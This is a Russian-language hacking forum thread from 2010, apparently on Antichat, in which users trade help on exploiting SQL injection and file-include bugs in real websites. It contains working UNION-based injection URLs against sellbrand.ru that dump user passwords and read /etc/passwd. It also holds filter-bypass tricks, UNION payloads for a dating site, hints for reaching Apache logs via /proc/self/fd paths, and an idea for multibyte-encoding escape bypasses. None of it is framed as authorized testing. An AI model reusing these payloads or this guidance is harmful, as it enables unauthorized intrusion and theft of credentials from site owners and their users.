05.04.2010, 22:10
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
С нами:
8836437
Репутация:
136
|
|
может кто поможет и подскажет как раскрутить....
получен доступ к password а к login нет
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+all+select+aes_decrypt(aes_encry pt(group_concat(pwd,0x3a+SEPARATOR+0x0b),0x71),0x7 1),2,3,4,5+from+users--
решил использовать load_file('/etc/passwd')
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+all+select+load_file(0x2f6574632 f706173737764),2,3,4,5+from+users--
получил права на чтение файлов
/home/
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+all+select+load_file(0x2f686f6d6 52f),2,3,4,5+from+users--
а вот в дальнейших деррикториях я запутался
|
|
|
06.04.2010, 00:29
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
в скуле фильтруются () как обойти? хексил, 0х28 0х29 не помогает.какие предложения?
|
|
|
|
06.04.2010, 01:30
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
Сообщение от Gorev
в скуле фильтруются () как обойти? хексил, 0х28 0х29 не помогает.какие предложения?
обходиться без функций и подзапросов, кеп ! или попробывать заюзать более продвинутую кодировку %28 %29
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
06.04.2010, 16:51
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
С нами:
8566197
Репутация:
18
|
|
Пытаюсь раскрутить site.com/search_result.php?(куча параметров)&country=13+order+by+1/*
Выплевовает ошибку
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/public_html/search_result.php on line 474
SELECT Profiles.ID, Headline, Country, Occupation, City, Sex, Sex2, ProfileType, NickName, Children, LEFT( DescriptionMe, 180 ) AS DescriptionMe, LEFT( DescriptionYou, 100 ) AS DescriptionYou, DateOfBirth, DateOfBirth2, Pic_0_addon, ExtraAddons, Sound, (LastNavTime > SUBDATE(NOW(), INTERVAL 5 MINUTE)) as is_onl FROM Profiles WHERE is_spamer <> '2' AND (LookingFor = 'female' OR LookingFor = 'both') AND (IF('both'='both' or 'both'='couple',1,Sex='both')) AND (IF('both'='couple',ProfileType='couple',ProfileTy pe!='couple')) AND (TO_DAYS(DateOfBirth) BETWEEN TO_DAYS('1934-04-06') AND (TO_DAYS('1992-04-06')+1)) AND (Country IN (-1,13 order by 1/*)) AND Status = 'Active' ORDER BY Priority DESC, Priority DESC, Profiles.LastLoggedIn DESC LIMIT 0, 15
Как обойти? Я новичек, посоветуйте плз. |
|
|
|
06.04.2010, 18:30
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами:
9364549
Репутация:
184
|
|
Сообщение от auth_root
Пытаюсь раскрутить site.com/search_result.php?(куча параметров)&country=13+order+by+1/*
Выплевовает ошибку
Как обойти? Я новичек, посоветуйте плз.
&country=-1)) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
и на всякий случай
&country=-1)) and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Последний раз редактировалось budden; 06.04.2010 в 18:32..
|
|
|
|
06.04.2010, 18:54
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
С нами:
8566197
Репутация:
18
|
|
Сообщение от budden
&country=-1)) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
и на всякий случай
&country=-1)) and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
budden пробовал закрывать скобки уже, не катит.and 1=0 тут не причём, тем более если &country=-1, можно просто 99999999 или +limit+1,1 (так тоже принтабельные можно вывести) но не в этом случае. Т.к. поля подобрать всё равно не представлется возможным. Подзапросы юзать наверное тоже не выйдет, я просто не пойму как обрезать запрос...
|
|
|
|
06.04.2010, 21:53
|
|
Познающий
Регистрация: 13.08.2007
Сообщений: 37
С нами:
9866407
Репутация:
1
|
|
Как думаете, реально раскрутить?
http://starosti.ru/archive.php?m=10&y=1909'
|
|
|
|
06.04.2010, 22:41
|
|
Новичок
Регистрация: 06.04.2010
Сообщений: 4
С нами:
8473067
Репутация:
0
|
|
Скажите от чего зависит цифра в имени ссылки на лог апача?
/proc/self/fd/2
/proc/self/fd/11
мне нужно чтоб при инклуде сразу добраться до логов.
|
|
|
|
07.04.2010, 00:00
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
С нами:
9419426
Репутация:
648
|
|
Сообщение от MuTANta
Скажите от чего зависит цифра в имени ссылки на лог апача?
/proc/self/fd/2
/proc/self/fd/11
мне нужно чтоб при инклуде сразу добраться до логов.
Это ярлыки.
Логам апача вроде соответствуют 2 или 7.
|
|
|
|
07.04.2010, 00:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Как насчет идеи провести пен-тест обхода mysql_escape_string и htmlspecialchar с использованием многобайтных кодировок. Развеевание в паблике мифа в реальность! Если да, то многие двиги можна скомпроментировать (искажение данный или експлуатация разных уязвимостей!). Смотрю здесь сегодня собрание)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
